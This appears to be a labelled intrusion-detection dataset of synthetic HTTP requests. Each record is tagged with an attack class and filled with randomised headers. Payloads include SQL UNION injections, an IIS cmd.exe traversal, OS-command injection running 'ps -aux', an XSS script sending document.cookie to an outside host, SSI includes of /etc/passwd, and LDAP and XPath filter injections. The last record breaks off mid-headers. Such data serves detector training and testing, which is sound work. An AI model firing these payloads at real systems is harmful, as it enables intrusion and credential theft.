Accept-Encoding: identity;q=0.5
Accept-Language: sP-AayN
Cache-Control: no-transform
Client-ip: 233.194.90.144
Cookie: aEii=or\[tar t;ooHthnno6a=t_fsrfZSKs;wtretzt=8gntbldoeasb3;Eq01yDV=9
Cookie2: $Version="609"
Date: Mon, 17 Mar 08 07:16:43 UTC
ETag: W/"x9FecdmJw.A7TCzY"
Expect: vaQg=itklittE
From: 0toi@nMoY9ioe.ch
If-Modified-Since: Tue, 06 Dec 05 23:23:38 GMT
If-Unmodified-Since: Tue, 30 Sep 08 06:09:32 CET
If-Match: "OfvDuR9paX9RqvEV7"
If-None-Match: *
If-Range: Thu, 09 Aug 07 03:01:01 GMT
Max-Forwards: 3152
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: ohdon nEbfg=9sctk
Authorization: ruOs2 s7fosnh=weuj
Range: 942-,92-,07-63
Referer: /ieee/st3vlt.wmn
TE: trailers,trailers,chunked;q=0.5
Trailer: Range
User-Agent: SnhemesydErseS
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 807x162
Via: 3.2 www.dsrs.js
Transfer-Encoding: identity
Upgrade: 1wi/0.9, ue5/8.1, uoi/7.4
Warning: 736 246.53.33.205 "ozyyvn" "Tue, 19 Feb 08 20:58:35 UTC"
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 0381591746319527137
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37781
Start - Id: 48658
class: XPathInjection
PUT /mer1Otlsuo7atod/829-2jX.png? HTTP/1.0
Content-Length: 399
Content-Language: aa
Content-Encoding: deflate
Content-Location: http://aite7o.de/dolq/vlanr.cfm
Content-MD5: NTV5c296cnVPcm5pcmVuZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 17 Aug 07 19:01:24 CET
Last-Modified: Mon, 29 Mar 04 12:24:30 CET
Host: 95.215.137.65
Connection: keep-alive
Accept: video/quicktime;q=0.4, text/plain
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-cache
Client-ip: 125.212.241.80
Cookie: somrliQnh=location;SctedSe2ep=itbmr
Cookie2: $Version="57"
Date: Fri, 17 Dec 04 11:14:02 UTC
ETag: W/"QyHg7ulSwO5be0D"
Expect: 100-continue
From: eta3@rewxn.biz
If-Modified-Since: Mon, 04 Oct 04 20:56:05 UTC
If-Unmodified-Since: Fri, 13 Nov 09 12:43:24 GMT
If-Match: "6mmMMgBTJ-fziOhaiZYm"
If-None-Match: *
If-Range: Sun, 05 Apr 09 10:23:32 GMT
Max-Forwards: 3676
MIME-Version: 0.2
Pragma: O='tt'
Proxy-Authorization: Tbena sv18tb=rrtc1i
Authorization: NTLM ZWJlZnVjdHplbndhZWVkb2FUY2pkb21OVGRubXN0dHVzbG5oeHRlSDVqNWc=
Range: -046912,8351-4,007308-22
Referer: /arh7nAf6/M7lsGtx/aoeco.jsp
TE: deflate,chunked;q=0.9,trailers
Trailer: Transfer-Encoding
User-Agent: ilaGM/4.4.8
UA-CPU: x86
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 090x151
Via: 9.0 www.oDoRl.shtml, erXsph/5.5 248.142.165.12, 9.0 65.10.206.200
Transfer-Encoding: gzip
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 958 171.58.48.221:65022 "tbsyeeovlI4la7he" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 9550547356245150782
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

tePaSt5aicb2qa=uaEagA'     or (i    <    count(1le0t/child::text())  and    j     <   count(3s/child::comment())  and   k    <     count(n6r/child::*)  )  or    'als'   = ' aJsak'     or&fg64DMopt=2753698&telptrrmdhuare=edrRuaeos&aPXecMVuO=7&erlTimessehhh4=Ehh&taHyueRoe4i=ein2ba3ncpp&eosp=td;\Eeouenoh 1saT h&rb=6778&r7sLrG=7843017443

End - Id: 48658
Start - Id: 39264
class: SSI
GET /3sRtoBFq33My/aute/3openupdateSIaiNNS/pcpm1FOjqgepk/mkn3g2c4V468reB1-Dkz/M.SL/tz6_HYQgktqiDzjHn.htm?poj=%3C%21--%23email+fromhost%3D%22www.mwiies.com%22+tohost%3D%22mailbox.dltgo.com%22+message%3D%22eijit+noeoeil+rcag+eo92ve%22+fromaddress%3D%22ry6id.com%22+toaddress%3D%226erai.on.com%22+subject%3D%22daa%22+sender%3D%229a.com%22+replyto%3D%22gztes.com%22+cc%3D%22Hehh%22+inreplyto%3D%22Aery+caa+i%22+id%3D%220Amail%22+--%3E HTTP/1.0
Host: 123.253.104.250:461
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: windows-874;q=0.7, x-mac-turkish;q=0.4
Accept-Encoding: gzip;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 154.176.125.112
Cookie: dntyRiqeeolrl=aw_;rdqevr4tanibyh=9377;des5tchot=03429728;eheoe2if=)tr8oeid2rt4;Af
Cookie2: $Version="81"
Date: Wed, 28 Apr 04 17:28:44 UTC
ETag: "HIPNOXACfKKzQ2mDTQ"
Expect: tnhoioon=ntmu;ndEx1r
From: ogpe@eKhmc.uk
If-Modified-Since: Mon, 19 Jul 04 19:47:23 UTC
If-Unmodified-Since: Mon, 05 May 08 10:30:15 CET
If-Match: *
If-None-Match: "DhzSYXLynhg3EnV5hUhi"
If-Range: Wed, 14 Feb 07 02:24:12 CET
Max-Forwards: 0023
MIME-Version: 1.6
Pragma: ipms='Mo0adag'
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: re4ttT enOa=dotDfoi
Range: 864-,5323-,-8736
Referer: http://0rklh.de/ehMno/tpyi0l.msf
TE: gzip,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/2.9 (Machintosh; U; PPC Mac OS X 2.3; Eu-rb; rv:5.0.1) Gecko/78269202
UA-CPU: MIPS
UA-Disp: 3603,824,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8684x662
Via: 2.4 www.l4t0snar.shtml, FTP/2.8 www.laped.shtml
Transfer-Encoding: deflate
Upgrade: 8gtyn/7.7, ttdrko/9.1, 7yofs/9.0
Warning: 014 58.200.111.202 "ltrIo" 
X-Forwarded-For: 237.101.171.41
X-Serial-Number: 2940498240401251
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39264
Start - Id: 43495
class: OsCommanding
GET /kJ@KWttu.bin?itftai2bdqrrLa=ysUi5%28n7y5Ed1fwp-&s5jroan=%27+++%3B+++ps++-aux%3B&erhpo=nyUirufcBUDX&lpasswdbK=%40%269%25i9B5o+wgetsrupy%2Fa&hfC@BH0=%3AYa&5425Teuhseua7=27516 HTTP/1.0
Host: www.polwhMcr.net
Connection: keep-alive
Accept: video/quicktime;q=0.9, video/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: qHBlvH-eauaryb, etnuie-7gyi3i
Cache-Control: no-cache
Client-ip: 135.38.176.126
Cookie: tlm=hs0aCroephpunbaservices;licbo=execos+<ss;0actacceptld;edsDwnl=46;ttpsr5Im=2laitn9e;ohlktcuoaqbeac=wonefH88privoBw;moesoecihzch=opcspq0eitczoi402
Cookie2: $Version="514"
Date: Wed, 19 Nov 08 11:19:33 UTC
ETag: W/"uhZCKDWcmyXWFNL"
Expect: reNwssAo=Iiubo;seruenh=eiwamf
From: fxtr5UaD@nYeuiAuhet.net
If-Modified-Since: Tue, 20 Oct 09 01:53:04 GMT
If-Unmodified-Since: Fri, 15 Feb 08 13:32:10 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 30 Apr 10 12:31:57 CET
Max-Forwards: 1
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: NTLM b2NpT2hvcW1vN2ljcXB0Z25oZXNzbUVvN2Vpc2FFcmRBc2RuaFQ=
Authorization: Basic NTJldzpibHZ5aGw0
Range: 32-61,4386-85
Referer: /nylnpe3e/norf5N/aoovohre/Ttrmunhu/fo8ezh4u.gif
TE: trailers
Trailer: Referer
User-Agent: Mozilla/1.4 (Machintosh; U; Mac OS X 3.7; tl-8m; rv:1.1.6) Gecko/51453484
UA-CPU: Sparc
UA-Disp: 777,376,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2941x889
Via: 5.8 33.148.210.176
Transfer-Encoding: compress
Upgrade: trzhel/9.1, tsfae/2.2
Warning: 030 157.207.32.92 "imad6oletnEdRcinytly" "Thu, 14 Apr 05 13:21:07 CET"
X-Forwarded-For: 137.226.116.122
X-Serial-Number: 5600215
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43495
Start - Id: 36628
class: OsCommanding
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 78.149.84.221:7997
Connection: keep-alive
Accept: text/*, image/*;q=0.3
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: oi0ipo-d0tp;q=0.8
Cache-Control: max-age=9
Client-ip: 107.48.3.140
Cookie: pn=57824;iseee1t=881;urriow=pu>k@6Thd;processing-instructionnCNzlinkHi=644027670;tet=g8DClC
Cookie2: $Version="2"
Date: Fri, 29 Apr 05 05:56:06 CET
ETag: "@gk9JmF._3FDu1iY"
Expect: 100-continue
From: safieadn@TokeCnm8Oe.org
If-Modified-Since: Tue, 27 Apr 10 16:28:36 GMT
If-Unmodified-Since: Wed, 28 Jul 04 19:39:57 GMT
If-Match: "5pgR@UAQxysEehx"
If-None-Match: *
If-Range: Thu, 05 Nov 09 09:20:03 UTC
Max-Forwards: 3150
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM b1JldHRpYXNhaWloaGlhdnh0ZGpRZWhza3IwYW90MGlCeGM=
Range: 75537-,8-
Referer: http://oDsI.net/hleulhp.pdf
TE: chunked;q=0.9,trailers,deflate
Trailer: TE
User-Agent: aarctetO (a_DsyP3H9; p_lqkNR; cUMK5xe; nkgrjeGkHv)
UA-CPU: StrongARM
UA-Disp: 427,9941,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 477x077
Via: cetahi/2.2 102.63.138.220, 5.4 www.lTveiTt.gif, aOAE/2.1 www.Aiieouo.jpeg:5
Transfer-Encoding: identity
Upgrade: aDote/0.4, nnlrf/4.3, ecsEa/7.5
Warning: 899 114.184.147.28:3879 "8dwEnsh88ee" 
X-Forwarded-For: 68.142.150.165
X-Serial-Number: 24160337067765
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36628
Start - Id: 35431
class: SqlInjection
GET /IxtosRgjag/hhtdmpeh2s9li5ahSt/eYI.BUh/rtc7d0/zXHw1FOQl5U/winntnidyaGtmpWN/aZ@h-M6I/ePikgbMSWbK8gWyi@/ilwqy0en1jTLGZaNf..jsp?iugieehig=sWDAX&TMnWVkZc7E=etraeuytux&oe8O=%27++OR+%274vf2uegiOe%27+++++LIKE+%27aze%2525 HTTP/1.0
Host: www.uikde.de:61473
Connection: close
Accept: audio/*;q=0.1
Accept-Charset: koi8-r;q=0.8
Accept-Encoding: deflate;q=0.7, gzip, deflate;q=0.7, deflate;q=0.4, compress
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 251.7.125.194
Cookie: tReH=d2YqD;wbeae=27680106;2ln=9156;rswutu6aeatiyl=uslsadaHoncivUlNti
Date: Mon, 23 Aug 04 02:35:26 UTC
ETag: W/"HFxe_V9toQg18oq"
Expect: 100-continue
From: wgttuate@lrahn.uk
If-Modified-Since: Sun, 16 May 04 23:36:51 UTC
If-Unmodified-Since: Thu, 06 Aug 09 15:31:01 CET
If-Match: *
If-None-Match: *
If-Range: "VjBik4dYmof3Qr6XC"
Max-Forwards: 7
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM ZWllYWFub2lSc3Nyc21VbnJwYWVtZWNudWF1dU56MW90d3BvbGhhdWNh
Authorization: Basic bzJoa21naWU6YUdudHlt
Range: 1117-95,491-
Referer: http://h8oorrc.gov/t2oehfOn/tftei3/u9es.txt
TE: deflate;q=0.7,chunked;q=0.3
Trailer: Trailer
User-Agent: Mozilla/2.2 (compatible; MSIE 4.8; Win 9x; mvt6imneIe)
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4231x7309
Via: ufo1i5/7.0 www.otrh.jpg
Transfer-Encoding: compress
Upgrade: a1uoii/9.3, 2Nnr06/6.4
Warning: 213 www.ha181.png "anao" "Fri, 28 Dec 07 24:10:22 UTC"
X-Forwarded-For: 115.143.230.10
X-Serial-Number: 323144017545
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35431
Start - Id: 48667
class: XPathInjection
PUT /6PCc3VHRbQOc_j/Bpx/Sve2avs7vjQRA/orhw9ccjuDtgtsmpyhHs.exe? HTTP/1.1
Content-Length: 149
Content-Language: e
Content-Encoding: deflate
Content-Location: /r7VHedxp/iIumhr.asmx
Content-MD5: bGFlaGVzOUVzZ3dhQXZzbg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 24 Dec 04 22:52:15 CET
Last-Modified: Wed, 14 Dec 05 16:26:41 CET
Host: www.njz6af.org:26
Connection: keep-alive
Accept: application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: SuEah-r;q=0.4, wlotie-4eh96f, H-Ehi5teo
Cache-Control: no-transform
Client-ip: 94.68.181.174
Cookie: safeenaii=85801;no4qt=032984;1ojoyp='8;0at4ae=]eelL>eMaac;snh5ou=tLCN3r8wM
Cookie2: $Version="97"
Date: Sat, 14 Feb 04 05:52:51 UTC
ETag: "X06f2gi681EKhR2"
Expect: 100-continue
From: eta3@rewxn.biz
If-Modified-Since: Thu, 13 Oct 05 23:37:38 GMT
If-Unmodified-Since: Fri, 27 Feb 04 07:18:26 GMT
If-Match: *
If-None-Match: *
If-Range: "Dq@hqaIle13M7L2QGj@-"
Max-Forwards: 789
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM cXRpQWFnd2NlemgwdjBhZXNsaWRzc3NvZWV0MmVveW5sbg==
Authorization: ugdnw pugF=iytalt
Range: 12-
Referer: /rrToLO6/ewGl/einumeN7.doc
TE: gzip,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.0 (Windows; U; WinNT 2.2; qu-if; rv:0.3.9) Gecko/24281325
UA-CPU: x86
UA-Disp: 9891,852,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2607x8764
Via: 5.7 www.5cldeueu.shtml
Transfer-Encoding: 75ipd; dwidtOt=nElnan
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 456 136.21.126.138:79216 "9ErN6ntiDgwn" 
X-Forwarded-For: 105.28.18.229
X-Serial-Number: 9550547356245150782
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

8YspeaE=fviN'] |  P  |    //user[   name/text(   )=  'ueL2&oiwla=aaNagkdsts&ee1eercijchs=auetrls&dtbfred0snhs=e5S&nieem=input

End - Id: 48667
Start - Id: 35272
class: SqlInjection
GET /slDLs/a@4eZvdevjmEjAiZJkg/iinat3n/g51@Ki4@RX2KdiHxr/vf5I59F/wv3zDL6fmvFxtDK/l1leLWnehckhaemor9/BU/eE.J1sg3xIYQcJNUNFv_/u8e3s1T/alfetdr/ilvtnr.msf?dDxii=l%40z0o7t&3aaen4isonau=%27++++%29++++UNION+ALL+++++SELECT+%27efaqgcdf%27%2C442%2C87%2C%27eSaf3ul%27%2C418+FROM++++xieupga+++WHERE+++%28++++%27%27++%3D%27&dassAa=f8n&rms0=42117309 HTTP/1.0
Host: 102.72.84.159:80
Connection: keep-alive
Accept: image/*;q=0.8
Accept-Charset: x-mac-icelandic;q=0.0, hz-gb-2312;q=0.1
Accept-Encoding: gzip, deflate;q=0.8, compress, compress
Accept-Language: sssLeem0-tc8;q=0.0, aeeyo-Ge, d-Omrrnani;q=0.9
Cache-Control: max-stale
Client-ip: 155.132.155.102
Cookie: r2n4nhentRrreno=<1kcopy;yrbrdse0snno=qOIadlI1y50E
Cookie2: $Version="7"
Date: Thu, 13 Jan 05 21:06:29 UTC
ETag: "bvEbhRuWJy1AnSCQb"
Expect: er8mb=9eoathib
From: giofe60@1lflop.de
If-Modified-Since: Sun, 08 Jan 06 18:15:37 UTC
If-Unmodified-Since: Tue, 08 Apr 08 17:22:25 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 15 Jul 07 08:27:02 CET
Max-Forwards: 52
MIME-Version: 8.3
Pragma: fat=ye
Proxy-Authorization: Digest cnonce="oCgves"
Authorization: Digest nc=2CdfbeAc
Range: 930-456,2355-
Referer: /twidme/d6dl/tetCod/tbp4.cgi
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.2 (compatible; MSIE 5.4; SunOS sun4u; onshAobu)
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 827x876
Via: FTP/7.5 www.ac1art.jpeg, FTP/4.7 www.rancoo.shtml
Transfer-Encoding: deflate
Upgrade: p0emTn/7.1, nmstn/3.3
Warning: 296 6.5.179.123 "hytu1eutoy" 
X-Forwarded-For: 162.78.14.7
X-Serial-Number: 32650890830963017
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35272
Start - Id: 47153
class: XSS
GET /nIChn.HEJ9FX5/E9eHjx5ceTinsertW1qH/33nnnzi6eagh.html?Qcopy69qSamVzDv=%3Doa&1i=oitnperstposcript3tbs1a+%26&7acceptuhy@zV9L2=%3Cstyle%3E%3C%21--%3C%2Fstyle++++%3E%3Cscript++++%3E%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.alatas.com%2Fcgi-bin%2Fngliicvear.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript++%3E&SOKWVby2oG=aiaeu&tmooaeas=linkreplace%27eaAr%7Ee%27turelwfgxp_&Rm=57550568&veaeu=aftp&r3=xamsG&Sa=sxs&myjlfTtg=894559&azoTseagzc=insertu HTTP/1.1
Host: 130.121.226.253
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: nanuCame-nTct
Cache-Control: min-fresh=49
Client-ip: 181.228.8.193
Cookie: eohasf9R=4824803;9BvbscriptJ=eo;sde=eegov;FnFtEln=6v;qm0cihhobxei7M=aiSueetysws;jdrne0r=tb
Cookie2: $Version="225"
Date: Fri, 15 Oct 04 12:32:43 GMT
ETag: W/"0zXn4F-uIX@DtGV_"
Expect: 100-continue
From: v1syist@Ntei5rra.com
If-Modified-Since: Fri, 24 Aug 07 17:42:58 CET
If-Unmodified-Since: Sun, 17 Jul 05 06:23:52 UTC
If-Match: "p@FdxEZ5d7SIrhrLmhI"
If-None-Match: "Bk@IKxqGEnEQMGu.e"
If-Range: Mon, 30 Nov 09 23:29:37 UTC
Max-Forwards: 2479
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest response="A354AfF913f0aEf3F0CAdDFBA4c0E2c5"
Authorization: NTLM ZThJdGlwbTlub2k1b25lNUl0YW9yZXR4ZXNkblNsbmU=
Range: -016,1-,67332-47295
Referer: http://yegsih3.org/r2asrl.msf
TE: trailers
Trailer: If-Modified-Since
User-Agent: aHotunn1sneralziqm
UA-CPU: 68000
UA-Disp: 9157,127,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: 4.8 140.128.117.70
Transfer-Encoding: gzip
Upgrade: see/0.0, ujnd/2.6, afee/4.4
Warning: 098 www.se8ib.png "Tiuetid8Hcaheepfhsi9" "Wed, 22 Feb 06 01:21:28 GMT"
X-Forwarded-For: 27.208.219.12
X-Serial-Number: 155966371996
----: ----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47153
Start - Id: 38783
class: LdapInjection
GET /dBi8nMatdspRsi4c/tknETXG3C1wd3/t67qGr93j99h/nirrtcg8ri/eoI.iAoxdzsqfZxm@D/rRdtihthoRcrLse/o39qqhRD1mor2I-MZSGG/ervt74etTeeyNewddryt/eirtbsrcweEnSo/62RQk-t0zRH/S0jh0.jpg?go201i=ehgt2hLo&twEue=%3C5open%24%3Ba%26i+%3Dprocessing-instructionc%3Fce%3Ee&ux4hoe=%29+++%28+%7C+++%28displayName%3Dhad*%29+++%28name++%3D+++had*++++%29%28+mail%3Dhad*+++%29 HTTP/1.0
Host: 8.141.87.242:80
Connection: Lh59iuec
Accept: application/postscript
Accept-Charset: x-mac-icelandic, windows-874
Accept-Encoding: 
Accept-Language: Ie-r;q=0.5, aTp-halke;q=0.6, oDtxw95r-i6s4n, a3-iqild, dit-motwaaJ;q=0.9
Cache-Control: max-age=2130
Client-ip: 103.114.5.31
Cookie: y9xrdsRtiueng=03473200;hqPTos=m;whaee2=374843;3Aaqgermuted=607;glhet=90547966;mehw6Iee9=e0irmTdeirn8te
Cookie2: $Version="919"
Date: Tue, 06 Jan 09 08:35:02 UTC
ETag: W/"saFjXR8ldmH5p5Akw0"
Expect: g2dtei
From: eedz@idneeachi.org
If-Modified-Since: Wed, 04 Jul 07 10:41:14 UTC
If-Unmodified-Since: Thu, 05 Nov 09 10:57:26 CET
If-Match: "xh2hiX1iqH@y@g2y0t"
If-None-Match: "eN33gtGBouoX8Cdp3I.a"
If-Range: "WumTLqIPh_8WEXcrbd"
Max-Forwards: 0797
MIME-Version: 3.1
Pragma: riesarad=ieae
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM OGU0b1J0bWd2YXJlZW9lbmlXdVM0YnVvdXRrdzVzenl5bzNsaXBvOA==
Range: 777808-9828,-9730,-076
Referer: /o27ft/9essA/u0li.swf
TE: trailers
Trailer: If-Modified-Since
User-Agent: ewnsi/8.2.4
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 601x604
Via: FTP/7.7 93.105.165.99, HTTP/6.7 238.93.211.162
Transfer-Encoding: gzip
Upgrade: uheEfl/5.8, bsp/0.2, slh/3.9, tfor/3.1, iAr/7.5
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 251.245.132.75
X-Serial-Number: 323337935267147
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38783
Start - Id: 36942
class: LdapInjection
PUT /nlsmdn0onftata4tl/apmeuhnar/hJpK23/ieantEt8k1/ehda6hegDatatylm/pe/0Apasswdauwa%uKP86/oq45/FFLW0kaE2CHXdocument4/tnDiehmreeer/dV.php? HTTP/1.1
Content-Length: 274
Content-Language: nbal,Hwyaahi
Content-Encoding: gzip
Content-Location: http://dhe9aw.cz/E8sat/lumoIcl/iiap/olire.zip
Content-MD5: c3JyZW5kYXJwYWhlaURlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 Jul 06 06:29:07 CET
Last-Modified: Sun, 07 Nov 04 19:31:59 CET
Host: 91.35.150.194:09
Connection: ejlsur
Accept: */*
Accept-Charset: big5, iso-8859-8-i, x-mac-japanese
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 28.240.217.24
Cookie: cgnoh3isanu=2t+pti4 5n1eyv;N0U8dYoKEe=2039;Omy=jEbody-tc;vZdmthvprocessing-instruction=26;WkWFtF_bGT=586473;gjsdouu=relinktsnnph-]aaobjecte
Cookie2: $Version="3"
Date: Mon, 15 Mar 10 08:14:03 CET
ETag: "QOCuHnFfkzG-_szi_7"
Expect: ekDesr
From: ohnue@asue.fr
If-Modified-Since: Sun, 01 Jan 06 15:22:10 CET
If-Unmodified-Since: Mon, 03 Oct 05 11:18:39 GMT
If-Match: "mBqyAZZ2PvBN0OOXlcn"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic c3BucnRhOm9yczFldTc=
Range: 060649-
Referer: http://2ciTodmt.fr/oaotte/m7ryepod/uofa.pdf
TE: trailers
Trailer: Via
User-Agent: Mozilla/5.6 (Windows; U; Win 9x 0.3; es-we; rv:3.5.1) Gecko/86748426
UA-CPU: PowerPC
UA-Disp: 1845,7989,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3317x800
Via: 8.2 5.78.241.105:8678, 6.2 www.coranqsi.html, FTP/6.8 26.40.18.134
Transfer-Encoding: identity
Upgrade: bnd/1.0, Soltt/0.3, thel6o/5.8, isuyna/8.9
Warning: 200 169.156.209.196:92 "0oiSeraRieyyto" "Thu, 26 Aug 04 15:57:50 UTC"
X-Forwarded-For: 76.215.12.133
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wactdhtgaotem=82&t5esdpnis=g)lc<tisaia&a1o4bsuhyr=</me2ana>helsnrvt&taiseir=7&sfutn=")(targetfilter=(o=NetscapeRoot))&ss=pcboytlten&efdnMfe8owaeha=e&wnmb5=04&yetczE=btoTatabh0&voSern=nq&lHszddihh6eh=ipy=mochabUac &tS.qRS=ikmSosk2tobechobodyaleyte

End - Id: 36942
Start - Id: 45520
class: PathTransversal
GET /aWleRWb87-8FqqlT/2ead/ROJor3rTGBDbZ/afb1nedlu6SXshtesfx6.jpeg?h5tr=eeAlcn&p73li=eA5tBAfkbUM&CxlRSsam_00rT=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fchll%2Fgeelns%2Fli%2Fittras.jsp&ettyie2flrO=hldparagdesdmu HTTP/1.0
Host: www.wsnIbhcej.net
Connection: rsIkads
Accept: video/quicktime
Accept-Charset: *;q=0.7
Accept-Encoding: compress;q=0.7, compress;q=0.4
Accept-Language: hnrhis-rIevin;q=0.8, Ysf-Sa;q=0.1, aoaKtaa-trwe2q8, mek-o
Cache-Control: max-age=76
Client-ip: 140.77.203.191
Cookie: toa7wssnaVmennF=nwddqmSwqP;rmeZg6k=928904;sam8D93passthruAQxbg=17;387eaNdEeTic=H saesoinsert ;Pupdatelm;1secnglC7eotpmn=iLbx
Cookie2: $Version="727"
Date: Thu, 18 May 06 12:38:47 GMT
ETag: W/"JCTn_ojKBCwZqY_Co"
Expect: ngo6Mwsy
From: t2hldl05@oephweoTmr.de
If-Modified-Since: Sat, 03 May 08 11:45:45 UTC
If-Unmodified-Since: Mon, 01 Jun 09 09:15:42 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 6.0
Pragma: xsfiorL=n0O
Proxy-Authorization: NTLM bm41ZTRwbnFya2lxbnJ0aGR0RXQwZTVpc05zNGR0ZXJ5cnBvY2ZkZnNu
Authorization: NTLM cFNyaGxyRWVobWlpbm9pcWlyY3VvYWVMamg4cmVJZFNlbkJsb2l0d3JlcjR6ZW0=
Range: 55569-482846
Referer: http://www.i1smwi.net/ilgc5n/tgdBG/w0i2wpne/i0Re.aspx
TE: gzip,trailers
Trailer: Accept
User-Agent: usbEybn
UA-CPU: 68000
UA-Disp: 1189,6667,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 441x867
Via: 4.6 www.ooda.css, smh8pp/6.2 www.Dloe0.jpg
Transfer-Encoding: compress
Upgrade: h9ve/7.6, nhnh/8.9, ajSeht/4.1, arunr/6.8, hoib/8.4
Warning: 262 www.yptv0dez.html "oibr8oPRotpdsee8a7ax" "Fri, 17 Aug 07 06:53:24 UTC"
X-Forwarded-For: 55.26.191.205
X-Serial-Number: 2215888867609
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45520
Start - Id: 39757
class: SSI
GET /c@IB2sG@--.nsf?rrDNft=dnenu&rSsdhn=hpe0z&VwnnCosR2S=s&e2Rf=ie2DDwyik&pinEnddxmktxqe5=601&y.DJJDTlmetaM=sefReyaurbenDl&puoescoatdLn=m+e&na1Hn=%3C%21--%23include+++virtual%3D%22%2Fetc%2Fpasswd%22++++--%3E&NHqRidww4access_logJX=Em1cuuro6el9o HTTP/1.0
Host: www.ueK6e.it
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: min-fresh=2
Client-ip: 122.119.15.78
Cookie: n09wf=c5rseaAnsyo;eebaazha=ftacei2t1raateesli;sfauyceetejn=Eesqi;ptWHJuidy_=55
Cookie2: $Version="098"
Date: Thu, 19 Aug 04 12:32:43 UTC
ETag: W/"SPPaJTHtAyD41NRBZ.-v"
Expect: 7atT=ybaN
From: ls8tIstr@r3edte.de
If-Modified-Since: Tue, 15 Mar 05 16:54:34 CET
If-Unmodified-Since: Fri, 31 Dec 04 10:08:36 CET
If-Match: *
If-None-Match: "Sxgz__kQ-nNDn4X6yIs"
If-Range: Tue, 02 Feb 10 21:58:05 GMT
Max-Forwards: 82
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=rOwsg8ds
Authorization: Basic aWxodHE3OkZkbWxzMmQ=
Range: 42-82,601-32,-86
Referer: /teaEeeTp/aAuxNbh.aspx
TE: trailers,trailers,gzip;q=0.9
Trailer: Date
User-Agent: Mozilla/9.7 (Machintosh; U; PPC 5.5; da-hd; rv:3.3.6) Gecko/46434547
UA-CPU: 68000
